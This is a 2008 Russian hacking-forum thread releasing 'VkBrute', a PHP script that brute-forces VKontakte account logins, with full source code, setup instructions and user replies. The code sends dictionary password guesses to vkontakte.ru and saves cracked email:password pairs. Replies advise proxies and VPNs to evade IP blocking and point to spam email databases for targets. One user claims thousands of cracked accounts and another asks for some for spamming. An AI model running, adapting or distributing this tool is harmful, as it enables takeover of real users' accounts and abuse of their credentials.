[ VkontakteBrute release ]
Описание:
Очередной брутфорс Вконтакте, теперь на php.
http://i051.radikal.ru/0806/52/61c826e3749e.png
Возможности:

Брут на один email по списку паролей
Брут на один пароль по списку email
Брут по списку email:password

Преимущества:

Графический интерфейс
Большое количество настроек
Простота
Скорость при одном потоке - 5 паролей в секунду
Работа на сервере

Требования:

PHP-хостинг с поддержкой сокетов

Установка и настройка:

Залить скрипт на сервер
Выставить права(chmod) на файл good.txt - 777
В файл dictionary.txt положить лист паролей или email'ov или список email:password
Запустить скрипт index.php и настроить его по своим нуждам.
Запустить и пойти пить пиво
Придти посмотреть пароли


<?php
#&-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-
#& VkBrute v. 1.03
#& author Chaak(ICQ:868922)
#&-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-


if(!isset($_POST['ok'])){
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="ru">
<head>
<title>.::Vkontakte brutforce by ChaaK::.</title>
<style>
body{
background-color: black;
}
table{
color: green;
font-weight: bold;
}
h1{
color: white;
}
</style>
</head>
<body>
<center style="margin-top:70px;">
<form action="" method="POST">
<h1>.::Vkontakte brutforce by ChaaK::.</h1>
<table border="1" width="540" height="240">
<tr><td valign="center" height="78" width="150">Тип атаки:</td><td valign="top">
<table border="0" width="100%" height="100%">
<tr><td><input name="attack" value="1" type="radio" checked="1"></td><td align="left">Атака на один email по списку паролей</td></tr>
<tr><td><input name="attack" value="2" type="radio"></td><td align="left">Атака на один пароль по списку email'ов</td></tr>
<tr><td><input name="attack" value="3" type="radio"></td><td align="left">Атака на список email:password</td></tr>
</table>
</td></tr>
<tr><td width="150" height="15px">E-mail</td><td style="font-size:12px"><input name="email" type="text" value="" size="33"> - для брута(для 1 вида атаки)</td></tr>
<tr><td width="150" height="15px">Пароль</td><td style="font-size:12px"><input name="pass" type="text" value="" size="33"> - для брута(для 2 вида атаки)</td></tr>
<tr><td width="150" height="15px">Словарь*</td><td><input name="dict" type="text" value="dictionary.txt" size="61"></td></tr>
<tr><td width="150" height="15px">Хорошие пароли</td><td><input type="text" name="good" value="good.txt" size="61"></td></tr>
<tr><td width="150" height="15px">Агент</td><td style="font-size:12px"><input type="text" name="user" value="Opera/9.50 (Windows NT 6.0; U; ru)" size="61"></td></tr>
<tr><td width="150" height="15px">Время работы*</td><td style="font-size:13px"><input type="text" name="time" value="0" size="5"> - время работы скрипта в минутах, если 0 - то бесконечно.</td></tr>
<tr><td colspan="2"><input type="submit" name="ok" value="::Начать работу::" style="width: 530px; height: 39px; background-color: black; color: green;"></td></tr>
</table>
</center>
</form>
</body>
</html>
<?php
}else{
set_time_limit(($_POST['time'])*60);

#############################################
$email = $_POST['email'];
$passw = $_POST['pass'];
$dict = @file($_POST['dict']);
$type= $_POST['attack'];
$result = $_POST['good'];
$user_agent = $_POST['user'];
#############################################

function brute($email,$pass) {
$fp=fsockopen("vkontakte.ru",80,$errno,$errstr,10);
$out = "GET /login.php?email=".$email."&pass=".$pass." HTTP/1.0\r\n";
$out .= "Host: vkontakte.ru\r\n";
$out .= "User-Agent: ".$GLOBALS['user_agent']."\r\n";
$out .= "Cookie: income=1\r\n";
$out .= "Content-Type:text/xml; charset=windows-1251\r\n\r\n";
fwrite($fp,$out);
$ans='';
while(!feof($fp))
{
$ans.=fgets($fp,128);
}
fclose($fp);
unset($out);
if(preg_match("/\b302 Found\b/is", $ans)) return true; else return false;
}


if($type==1){
for($i=0;$i<count($dict);$i++){
$dict[$i]=trim($dict[$i]);
if(brute($email,$dict[$i])){
$fp=fopen($result,'ab');
fwrite($fp,$email.':'.$dict[$i]."\n");
fclose($fp);
exit();
}
unset($dict[$i]);
ob_implicit_flush();
}
}elseif($type==2){
for($i=0;$i<count($dict);$i++){
$dict[$i]=trim($dict[$i]);
if(brute($dict[$i],$passw)){
$fp=fopen($result,'ab');
fwrite($fp,$dict[$i].':'.$passw."\n");
fclose($fp);
}
unset($dict[$i]);
ob_implicit_flush();
}
}elseif($type==3){
for($i=0;$i<count($dict);$i++){
$dict[$i]=trim($dict[$i]);
$array = explode(":",$dict[$i]);
if(brute($array[0],$array[1])){
$fp=fopen($result,'ab');
fwrite($fp,$array[0].':'.$array[1]."\n");
fclose($fp);
}
unset($dict[$i]);
ob_implicit_flush();
}
}
echo "Брут завершен! Смотрите результаты в файле <a href='$result'>$result</a>";
}
?>


Автор ©ChaaK 2008

щас заценим.

красиво выглядит, а с поддержкой сокетов какие хостинги фришные есть?

А где там потоки править?

Там один поток. Многопоточность пока у меня в разработке.
изобретёшь новый php? пыха потоки не поддерживает

имхо добавь ещё игнор юзер аборт чтоб закрывать можно было

изобретёшь новый php? пыха потоки не поддерживает

Мб он с помощью форка сделает подобие

боян брут на пхп бред полный
я это говорил говорю и буду говорить
вот kaimi хороший брут сделал тока вот памяти многовато кушает а так норм

боян брут на пхп бред полный
я это говорил говорю и буду говорить
вот kaimi хороший брут сделал тока вот памяти многовато кушает а так норм
ты поди пару лямов мыл загрузил)))у мя тоже самое

_http://www.seoblog.com.ua/2007/03/20/multiplexing-in-php/
Подобие многопоточности.

изобретёшь новый php? пыха потоки не поддерживает

Погугли: "многопоточность php неблокируемые сокеты"

Где брать мыльники? =\

Походу актуален только первый вид подбора...
Так как врядли у когото есть база логинов(мыльников) ВК....

многопоточности в php нет и ещё явно долго не будет..всё о чём вы говорите это псевдо многопоточность

Isis
Ну и вопрос!

Mr.Tech
Жжош. И зачем тебе непременно ВСЕ мыльники вконтакта? :)

Sharky
Да это псевдомногопоточность, и она отлично подходит для поставленной задачи :)

P.S.
т.к. мой ip блокировал контакт, то мне понадобилась поддержка прокси. В общем держите кому надо - тот же скрипт только работающий через проксю + убран баг с user-agent
http://rapidshare.com/files/122727090/index.php.html

diehard, в брутуре есть фуекция брут по списку мыльников... Так где их взять? ))

diehard, в брутуре есть фуекция брут по списку мыльников... Так где их взять? ))
Как где?
Скачай спам базу!

http://depositfiles.com/ru/files/5823332

Как вы уже заебали....
пиздец ща этих брутеров расплодилось, ток толку с них а??? на аки стоят не такие уж и простые пароли, хоть ктото хоть один пароль сбрутил?
Ща модная тенденция, брать чужие сорцы смотреть , немного их переделывать и выкладывать свою версию, не задумываясь а нужен ли вобще данный скрипт комуто, пытаясь тем самым показать какой ты охуенный php кодер

есле честно то уже достали всякий мусор выкладывать, и создавать для этого отдельные темы, ужеб в одной все выкладывали...

фтопку все эти говнотулзы!
пишите лучше сплоенты под булку и дле!

Испарвлен баг, изза которого файл подкачки на unix-серверах забивался

Фига...таки на всех "unix-серверах" есть файл подкачки? :))) Не знал :)

дедик небось виндовый? )))

у меня такая трабла: после старта брута он моментально выдает "Брут завершен! Смотрите результаты в файле good.txt" good.txt естно пустой)) (хост с сокетами и set_time)...

mr.TECH
А ты подумай: это самый популярный ресурс в ру-нете. Да подойдет любая спам-база майл.ру

nc.STRIEM
Ты вообще по вконтакту работаешь? Если нет - зачем вообще говорить по теме в которой не рубишь?

>>diehard
да работаю

скажи мне, сколько ты сбрутил аков?

>>diehard
да работаю

скажи мне, сколько ты сбрутил аков?

5 тысяч за 3 дня перловыми скриптами.

5 тысяч за 3 дня перловыми скриптами.
Неслабо....

diehard - если сложно поделись парочкой на один пасс... Чисто в своих целях для спама... Заранее благодарю!

Пробывал тестить на 2ru.name - не хочет работать! Кто может посоветовать какие хостинги!?

Локалхост + впн - лучшая связка. А локалхост + впн + соксы - the best.

Ребят, вот у меня денвер стоит, только я к нету через прокси подключаюсь - прокатит ли так!? Т.е. локалхост и подключен через прокси к другому компу - а тот выходит в нет через впн!

Выложите плиз вновь скрипт! а то сылки все битые уже!

теперь на php.
Порадовало))ПХП несомненно лучше того же делфи для брута :)

Ну че кто нить выложит!?

возможно вопрос покажится глупым, но всё же прошу на него ответить, чём открыть vchat flash 8.fla, может кто ссылку даст )

Macromedia Flash :D

значит Macromedia Flash мне попался какойто не такой, если у меня не получилось им открыть o_O

не получаеться у меня что-то настроить этот скрипт =( возможно проблема с хостингом, подскажие кто откуда брутит?

Ссылка битая! У кого есть - перезалейте - и если можно - скиньте мне в пм! С меня +3!

Порадовало))ПХП несомненно лучше того же делфи для брута :)
Почему?
В PHP нет многопоточности, он медленный... чем же он лучше?

писать брут хоть чего на пхп это глупость

В общем поставил на хост с сокетами! Права выставил! Прописал рабочий прокси! Жму начать работу и выскакивает:

Вы пытались получить доступ к адресу http://*****/.ru/, который сейчас не доступен. Убедитесь, что веб-адрес (URL) введен без ошибок, и попытайтесь перезагрузить страницу.

Кто на хосте тестил - у кого работает!?

Запрошенный файл не найден в базе WebFile.ru.

Повторно выложить можно?

Кто на хосте тестил - у кого работает!?

залей пожалуйста, скачать не могу

Кто скачивал - выложить может?